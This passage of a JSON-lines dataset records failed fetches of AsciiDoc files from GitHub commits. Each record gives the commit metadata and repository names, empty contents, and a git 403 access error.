2015-11-17-Projeto-Homens-Libertem-se.adoc","repos":"homenslibertemse\/homenslibertemse.github.io,homenslibertemse\/homenslibertemse.github.io,homenslibertemse\/homenslibertemse.github.io","old_file":"_posts\/2015-11-17-Projeto-Homens-Libertem-se.adoc","new_file":"_posts\/2015-11-17-Projeto-Homens-Libertem-se.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/homenslibertemse\/homenslibertemse.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f391ff58760efa9f0b5d55dd79c4886626fa5c8f","subject":"y2b create post Ever Tried Bone Conduction?","message":"y2b create post Ever Tried Bone Conduction?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-05-09-Ever-Tried-Bone-Conduction.adoc","new_file":"_posts\/2016-05-09-Ever-Tried-Bone-Conduction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"215326b6ff05e4f316a77eed0d50d66736fd63fa","subject":"Update 2016-06-24-Midterm-Lets-go-to-O-H-M-B.adoc","message":"Update 2016-06-24-Midterm-Lets-go-to-O-H-M-B.adoc","repos":"erramuzpe\/gsoc2016,erramuzpe\/gsoc2016,erramuzpe\/gsoc2016,erramuzpe\/gsoc2016","old_file":"_posts\/2016-06-24-Midterm-Lets-go-to-O-H-M-B.adoc","new_file":"_posts\/2016-06-24-Midterm-Lets-go-to-O-H-M-B.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/erramuzpe\/gsoc2016.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"06169aaa2c9b578de8b77fbc11b5103e51ba844d","subject":"Update 2018-09-27-repair-grub2-lvm2-luks-encrypted-system-volume-group-not-found.adoc","message":"Update 2018-09-27-repair-grub2-lvm2-luks-encrypted-system-volume-group-not-found.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2018-09-27-repair-grub2-lvm2-luks-encrypted-system-volume-group-not-found.adoc","new_file":"_posts\/2018-09-27-repair-grub2-lvm2-luks-encrypted-system-volume-group-not-found.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6335e7dd759fc217a22935769e677602bed9abd6","subject":"Update 2018-12-01-Software-Developers-Guide-to-Working-in-Open-Floor-Plan-Office.adoc","message":"Update 2018-12-01-Software-Developers-Guide-to-Working-in-Open-Floor-Plan-Office.adoc","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-12-01-Software-Developers-Guide-to-Working-in-Open-Floor-Plan-Office.adoc","new_file":"_posts\/2018-12-01-Software-Developers-Guide-to-Working-in-Open-Floor-Plan-Office.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c5d38a856b07e6bd548176295d13064de2356d06","subject":"Update README.adoc","message":"Update README.adoc","repos":"huunhancit\/spring-xd-samples,viveksd87\/spring-xd-samples,viveksd87\/spring-xd-samples,spring-projects\/spring-xd-samples,constantlearner\/spring-xd,viveksd87\/spring-xd-samples,ghillert\/spring-xd-samples,felipeg48\/spring-xd-samples,constantlearner\/spring-xd,trisberg\/spring-xd-samples,rajkumargithub\/spring-xd-samples,constantlearner\/spring-xd,trisberg\/spring-xd-samples,rajkumargithub\/spring-xd-samples,ghillert\/spring-xd-samples,trisberg\/spring-xd-samples,morfeo8marc\/spring-xd-samples,ghillert\/spring-xd-samples,ghillert\/spring-xd-samples,spring-projects\/spring-xd-samples,huunhancit\/spring-xd-samples,viveksd87\/spring-xd-samples,felipeg48\/spring-xd-samples,rajkumargithub\/spring-xd-samples,trisberg\/spring-xd-samples,huunhancit\/spring-xd-samples,trisberg\/spring-xd-samples,morfeo8marc\/spring-xd-samples,huunhancit\/spring-xd-samples,constantlearner\/spring-xd,viveksd87\/spring-xd-samples,spring-projects\/spring-xd-samples,felipeg48\/spring-xd-samples,constantlearner\/spring-xd,felipeg48\/spring-xd-samples,spring-projects\/spring-xd-samples,huunhancit\/spring-xd-samples,felipeg48\/spring-xd-samples,felipeg48\/spring-xd-samples,morfeo8marc\/spring-xd-samples,rajkumargithub\/spring-xd-samples,morfeo8marc\/spring-xd-samples,morfeo8marc\/spring-xd-samples,huunhancit\/spring-xd-samples,ghillert\/spring-xd-samples,constantlearner\/spring-xd,spring-projects\/spring-xd-samples,morfeo8marc\/spring-xd-samples,viveksd87\/spring-xd-samples,rajkumargithub\/spring-xd-samples,trisberg\/spring-xd-samples,spring-projects\/spring-xd-samples,rajkumargithub\/spring-xd-samples,ghillert\/spring-xd-samples","old_file":"analytics-pmml\/README.adoc","new_file":"analytics-pmml\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/constantlearner\/spring-xd.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"62ab127ed182185d26045e1d29a44cd6a40df2ab","subject":"Initial proposal on migrating to CRDs (#3231)","message":"Initial proposal on migrating to CRDs (#3231)\n\n* Initial proposal on migrating to CRDs\r\n* Update proposal based on review feedback\r\n","repos":"EnMasseProject\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse","old_file":"documentation\/design\/proposals\/crdification.adoc","new_file":"documentation\/design\/proposals\/crdification.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jenmalloy\/enmasse.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3fb770438184d56164af76e8552731c30a7a4d13","subject":"Renamed '_posts\/2016-05-23-Horoshij-spravochnik-po-ASCIIDOC-AsciiDoc-cheatsheet.adoc' to '_posts\/2016-05-23-ASCIIDOC-Ascii-Doc-cheatsheet.adoc'","message":"Renamed '_posts\/2016-05-23-Horoshij-spravochnik-po-ASCIIDOC-AsciiDoc-cheatsheet.adoc' to '_posts\/2016-05-23-ASCIIDOC-Ascii-Doc-cheatsheet.adoc'","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2016-05-23-ASCIIDOC-Ascii-Doc-cheatsheet.adoc","new_file":"_posts\/2016-05-23-ASCIIDOC-Ascii-Doc-cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c3a2f8fd1054b46ca7e98c74bfc6d6aa637db776","subject":"Update 2017-03-15-E-Gt-showing-Nothing-to-fetch.adoc","message":"Update 2017-03-15-E-Gt-showing-Nothing-to-fetch.adoc","repos":"jsiu22\/blog,jsiu22\/blog,jsiu22\/blog,jsiu22\/blog","old_file":"_posts\/2017-03-15-E-Gt-showing-Nothing-to-fetch.adoc","new_file":"_posts\/2017-03-15-E-Gt-showing-Nothing-to-fetch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsiu22\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"54724ea47c7b709188fadbadd8d0c21bd291b150","subject":"Update 2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","message":"Update 2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","new_file":"_posts\/2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"84d925456d6f7019db92c6b3f565d194bd859d41","subject":"Update 2017-11-23-Azure-8.adoc","message":"Update 2017-11-23-Azure-8.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-23-Azure-8.adoc","new_file":"_posts\/2017-11-23-Azure-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"46329d39e56bb32d7ed3870b69af9c8c270c077d","subject":"Update 2016-02-29-Meine-ersten-Schritte-mit-dem-Hubpress-Blog-via-Git-Hub-Repository.adoc","message":"Update 2016-02-29-Meine-ersten-Schritte-mit-dem-Hubpress-Blog-via-Git-Hub-Repository.adoc","repos":"AlexL777\/hubpressblog,AlexL777\/hubpressblog,AlexL777\/hubpressblog,AlexL777\/hubpressblog","old_file":"_posts\/2016-02-29-Meine-ersten-Schritte-mit-dem-Hubpress-Blog-via-Git-Hub-Repository.adoc","new_file":"_posts\/2016-02-29-Meine-ersten-Schritte-mit-dem-Hubpress-Blog-via-Git-Hub-Repository.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AlexL777\/hubpressblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"feb89adea71b4140e435a29da3bfa70e325978d8","subject":"Update 2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f1838f0bee615a8ed797b5db55d87cbcf7d0b23a","subject":"y2b create post Motorola Mystery Box Unboxing","message":"y2b create post Motorola Mystery Box Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-02-26-Motorola-Mystery-Box-Unboxing.adoc","new_file":"_posts\/2015-02-26-Motorola-Mystery-Box-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a42a6baf018bb3b7cefe1efee4aebfdb74d7feb8","subject":"Publish 2011-10-112-Peak-Java.adoc","message":"Publish 2011-10-112-Peak-Java.adoc","repos":"bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io","old_file":"2011-10-112-Peak-Java.adoc","new_file":"2011-10-112-Peak-Java.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bigkahuna1uk\/bigkahuna1uk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0f6d2718b3f9d09bb8faa5b585cd884bb2ddc909","subject":"Update 2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","message":"Update 2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","new_file":"_posts\/2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6875ab1f2eee199b87da636660793a898f5b60a1","subject":"created guide for crimping RJ-45 cables","message":"created guide for crimping RJ-45 cables\n","repos":"UCSolarCarTeam\/Recruit-Resources,UCSolarCarTeam\/Recruit-Resources,UCSolarCarTeam\/Recruit-Resources,UCSolarCarTeam\/Recruit-Resources","old_file":"Cable-Crimping\/README.adoc","new_file":"Cable-Crimping\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/UCSolarCarTeam\/Recruit-Resources.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"41465f92a33d476dda4cad9534154b02378d23c1","subject":"copy releasenotes to master","message":"copy releasenotes to master\n","repos":"appNG\/appng,appNG\/appng,appNG\/appng","old_file":"releasenotes_1.21.0.adoc","new_file":"releasenotes_1.21.0.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/appNG\/appng.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fe793c64c18c65722cc175e774ee0ab4203d239a","subject":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","message":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"46b1fb78c06d735da7db9570321c433be552803b","subject":"Update 2017-05-03-Server-Virtualization-Management-Part3.adoc","message":"Update 2017-05-03-Server-Virtualization-Management-Part3.adoc","repos":"roobyz\/roobyz.github.io,roobyz\/roobyz.github.io,roobyz\/roobyz.github.io,roobyz\/roobyz.github.io","old_file":"_posts\/2017-05-03-Server-Virtualization-Management-Part3.adoc","new_file":"_posts\/2017-05-03-Server-Virtualization-Management-Part3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/roobyz\/roobyz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1723c016f12a69a17ebc9c789116fae9b84b45b5","subject":"Update 2016-11-14-231000-Monday.adoc","message":"Update 2016-11-14-231000-Monday.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-14-231000-Monday.adoc","new_file":"_posts\/2016-11-14-231000-Monday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"73faf7298db4c7ebd61d12777e56dce8d1d6d652","subject":"Added description of request extension functions and warning about not installing in directory containing spaces","message":"Added description of request extension functions and warning about not installing in directory containing spaces\n","repos":"Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb","old_file":"docs\/XSLWeb Developer Manual.adoc","new_file":"docs\/XSLWeb Developer Manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Armatiek\/xslweb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7a39c73f7d4bd880d55cac353b51e82b9d30d53a","subject":"Update 2016-08-09-TP.adoc","message":"Update 2016-08-09-TP.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-08-09-TP.adoc","new_file":"_posts\/2016-08-09-TP.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"052e610d1362c3a17458cb7964fd945edb51dfbc","subject":"Update 2018-01-27-react-router-4-hash-History-link-not-rendering-view-rendered-after-refresh.adoc","message":"Update 2018-01-27-react-router-4-hash-History-link-not-rendering-view-rendered-after-refresh.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2018-01-27-react-router-4-hash-History-link-not-rendering-view-rendered-after-refresh.adoc","new_file":"_posts\/2018-01-27-react-router-4-hash-History-link-not-rendering-view-rendered-after-refresh.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e589ee537b5b2a077fc12b417f7ae47473a62a2b","subject":"Update 2017-05-20-oi.adoc","message":"Update 2017-05-20-oi.adoc","repos":"mairandomness\/randomblog,mairandomness\/randomblog,mairandomness\/randomblog,mairandomness\/randomblog","old_file":"_posts\/2017-05-20-oi.adoc","new_file":"_posts\/2017-05-20-oi.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mairandomness\/randomblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"76c97c873c1979112bcd212e5ad397f17dd053d9","subject":"Update 2017-09-22-aa.adoc","message":"Update 2017-09-22-aa.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-22-aa.adoc","new_file":"_posts\/2017-09-22-aa.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"74f4cde041a4b12b593f19d9dc9e4d6b78dd0ae3","subject":"Include folder is duplicated everywhere","message":"Include folder is duplicated everywhere\n\nIntroduce `:includedir:`.\n","repos":"dulanov\/emerald-rs","old_file":"docs\/api.adoc","new_file":"docs\/api.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dulanov\/emerald-rs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"25844f4260e8b7b02c8be371045a4b2ce42e36df","subject":"Update 2015-09-23-Story-of-my-Life.adoc","message":"Update 2015-09-23-Story-of-my-Life.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-09-23-Story-of-my-Life.adoc","new_file":"_posts\/2015-09-23-Story-of-my-Life.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d64f6c8d439c500556b84d013ff3d4dc74d71f6","subject":"Update 2016-11-23-what-buy-accepting-bitcoin.adoc","message":"Update 2016-11-23-what-buy-accepting-bitcoin.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-11-23-what-buy-accepting-bitcoin.adoc","new_file":"_posts\/2016-11-23-what-buy-accepting-bitcoin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"278c0d2437f33ae66131138f31895dc7485d7068","subject":"new release","message":"new release\n","repos":"clojure\/clojurescript-site","old_file":"content\/news\/2017-10-03-release.adoc","new_file":"content\/news\/2017-10-03-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojurescript-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"3224cf63b6564396a7b7619a23a85a05210bad47","subject":"Update 2016-08-17-The-Dangers-of-Multirepo.adoc","message":"Update 2016-08-17-The-Dangers-of-Multirepo.adoc","repos":"MatanRubin\/MatanRubin.github.io,MatanRubin\/MatanRubin.github.io,MatanRubin\/MatanRubin.github.io,MatanRubin\/MatanRubin.github.io","old_file":"_posts\/2016-08-17-The-Dangers-of-Multirepo.adoc","new_file":"_posts\/2016-08-17-The-Dangers-of-Multirepo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MatanRubin\/MatanRubin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff1530592eea940fead21f5b83da8bf638c694d8","subject":"Docs: Fix indentation in has-child-query.asciidoc (#23565)","message":"Docs: Fix indentation in has-child-query.asciidoc (#23565)\n\n","repos":"glefloch\/elasticsearch,shreejay\/elasticsearch,markwalkom\/elasticsearch,maddin2016\/elasticsearch,robin13\/elasticsearch,scottsom\/elasticsearch,vroyer\/elassandra,gingerwizard\/elasticsearch,winstonewert\/elasticsearch,umeshdangat\/elasticsearch,JSCooke\/elasticsearch,nazarewk\/elasticsearch,Helen-Zhao\/elasticsearch,wenpos\/elasticsearch,brandonkearby\/elasticsearch,Stacey-Gammon\/elasticsearch,wenpos\/elasticsearch,shreejay\/elasticsearch,LeoYao\/elasticsearch,mortonsykes\/elasticsearch,a2lin\/elasticsearch,LeoYao\/elasticsearch,alexshadow007\/elasticsearch,sneivandt\/elasticsearch,LeoYao\/elasticsearch,ZTE-PaaS\/elasticsearch,mortonsykes\/elasticsearch,kalimatas\/elasticsearch,Helen-Zhao\/elasticsearch,fred84\/elasticsearch,strapdata\/elassandra,markwalkom\/elasticsearch,LewayneNaidoo\/elasticsearch,kalimatas\/elasticsearch,bawse\/elasticsearch,Shepard1212\/elasticsearch,markwalkom\/elasticsearch,shreejay\/elasticsearch,gingerwizard\/elasticsearch,umeshdangat\/elasticsearch,JackyMai\/elasticsearch,s1monw\/elasticsearch,LeoYao\/elasticsearch,robin13\/elasticsearch,strapdata\/elassandra,IanvsPoplicola\/elasticsearch,nezirus\/elasticsearch,masaruh\/elasticsearch,vroyer\/elasticassandra,artnowo\/elasticsearch,strapdata\/elassandra,brandonkearby\/elasticsearch,nazarewk\/elasticsearch,scottsom\/elasticsearch,artnowo\/elasticsearch,JackyMai\/elasticsearch,a2lin\/elasticsearch,mohit\/elasticsearch,naveenhooda2000\/elasticsearch,gfyoung\/elasticsearch,qwerty4030\/elasticsearch,HonzaKral\/elasticsearch,bawse\/elasticsearch,maddin2016\/elasticsearch,Helen-Zhao\/elasticsearch,glefloch\/elasticsearch,sneivandt\/elasticsearch,maddin2016\/elasticsearch,qwerty4030\/elasticsearch,naveenhooda2000\/elasticsearch,mjason3\/elasticsearch,bawse\/elasticsearch,coding0011\/elasticsearch,naveenhooda2000\/elasticsearch,umeshdangat\/elasticsearch,StefanGor\/elasticsearch,fred84\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,Stacey-Gammon\/elasticsearch,alexshadow007\/elasticsearch,wenpos\/elasticsearch,jprante\/elasticsearch,uschindler\/elasticsearch,winstonewert\/elasticsearch,mjason3\/elasticsearch,jprante\/elasticsearch,kalimatas\/elasticsearch,LewayneNaidoo\/elasticsearch,MisterAndersen\/elasticsearch,IanvsPoplicola\/elasticsearch,jimczi\/elasticsearch,ZTE-PaaS\/elasticsearch,njlawton\/elasticsearch,coding0011\/elasticsearch,Shepard1212\/elasticsearch,njlawton\/elasticsearch,GlenRSmith\/elasticsearch,rajanm\/elasticsearch,fred84\/elasticsearch,IanvsPoplicola\/elasticsearch,StefanGor\/elasticsearch,artnowo\/elasticsearch,artnowo\/elasticsearch,nezirus\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,LeoYao\/elasticsearch,s1monw\/elasticsearch,maddin2016\/elasticsearch,rajanm\/elasticsearch,HonzaKral\/elasticsearch,fernandozhu\/elasticsearch,lks21c\/elasticsearch,scottsom\/elasticsearch,vroyer\/elassandra,scottsom\/elasticsearch,uschindler\/elasticsearch,mjason3\/elasticsearch,nknize\/elasticsearch,lks21c\/elasticsearch,scorpionvicky\/elasticsearch,Shepard1212\/elasticsearch,masaruh\/elasticsearch,jprante\/elasticsearch,lks21c\/elasticsearch,maddin2016\/elasticsearch,StefanGor\/elasticsearch,fernandozhu\/elasticsearch,bawse\/elasticsearch,naveenhooda2000\/elasticsearch,LewayneNaidoo\/elasticsearch,HonzaKral\/elasticsearch,lks21c\/elasticsearch,nknize\/elasticsearch,C-Bish\/elasticsearch,winstonewert\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,mohit\/elasticsearch,jimczi\/elasticsearch,jimczi\/elasticsearch,pozhidaevak\/elasticsearch,masaruh\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,JSCooke\/elasticsearch,Shepard1212\/elasticsearch,markwalkom\/elasticsearch,nazarewk\/elasticsearch,brandonkearby\/elasticsearch,JSCooke\/elasticsearch,artnowo\/elasticsearch,scottsom\/elasticsearch,a2lin\/elasticsearch,nazarewk\/elasticsearch,nazarewk\/elasticsearch,gingerwizard\/elasticsearch,C-Bish\/elasticsearch,bawse\/elasticsearch,umeshdangat\/elasticsearch,fernandozhu\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,JSCooke\/elasticsearch,jimczi\/elasticsearch,jimczi\/elasticsearch,winstonewert\/elasticsearch,gingerwizard\/elasticsearch,jprante\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,mortonsykes\/elasticsearch,HonzaKral\/elasticsearch,sneivandt\/elasticsearch,umeshdangat\/elasticsearch,mohit\/elasticsearch,vroyer\/elassandra,Stacey-Gammon\/elasticsearch,lks21c\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,JSCooke\/elasticsearch,gingerwizard\/elasticsearch,sneivandt\/elasticsearch,GlenRSmith\/elasticsearch,strapdata\/elassandra,rajanm\/elasticsearch,gingerwizard\/elasticsearch,vroyer\/elasticassandra,JackyMai\/elasticsearch,strapdata\/elassandra,LewayneNaidoo\/elasticsearch,glefloch\/elasticsearch,gfyoung\/elasticsearch,njlawton\/elasticsearch,uschindler\/elasticsearch,ZTE-PaaS\/elasticsearch,Stacey-Gammon\/elasticsearch,MisterAndersen\/elasticsearch,JackyMai\/elasticsearch,qwerty4030\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,sneivandt\/elasticsearch,rajanm\/elasticsearch,StefanGor\/elasticsearch,rajanm\/elasticsearch,scorpionvicky\/elasticsearch,MisterAndersen\/elasticsearch,IanvsPoplicola\/elasticsearch,qwerty4030\/elasticsearch,brandonkearby\/elasticsearch,shreejay\/elasticsearch,alexshadow007\/elasticsearch,s1monw\/elasticsearch,rajanm\/elasticsearch,qwerty4030\/elasticsearch,vroyer\/elasticassandra,Helen-Zhao\/elasticsearch,nknize\/elasticsearch,fernandozhu\/elasticsearch,C-Bish\/elasticsearch,robin13\/elasticsearch,LewayneNaidoo\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,Shepard1212\/elasticsearch,Helen-Zhao\/elasticsearch,JackyMai\/elasticsearch,s1monw\/elasticsearch,wangtuo\/elasticsearch,ZTE-PaaS\/elasticsearch,mortonsykes\/elasticsearch,mohit\/elasticsearch,wenpos\/elasticsearch,uschindler\/elasticsearch,a2lin\/elasticsearch,masaruh\/elasticsearch,coding0011\/elasticsearch,fernandozhu\/elasticsearch,pozhidaevak\/elasticsearch,C-Bish\/elasticsearch,mjason3\/elasticsearch,nezirus\/elasticsearch,mjason3\/elasticsearch,coding0011\/elasticsearch,mohit\/elasticsearch,IanvsPoplicola\/elasticsearch,wangtuo\/elasticsearch,njlawton\/elasticsearch,brandonkearby\/elasticsearch,naveenhooda2000\/elasticsearch,MisterAndersen\/elasticsearch,kalimatas\/elasticsearch,scorpionvicky\/elasticsearch,markwalkom\/elasticsearch,pozhidaevak\/elasticsearch,StefanGor\/elasticsearch,mortonsykes\/elasticsearch,jprante\/elasticsearch,glefloch\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,s1monw\/elasticsearch,ZTE-PaaS\/elasticsearch,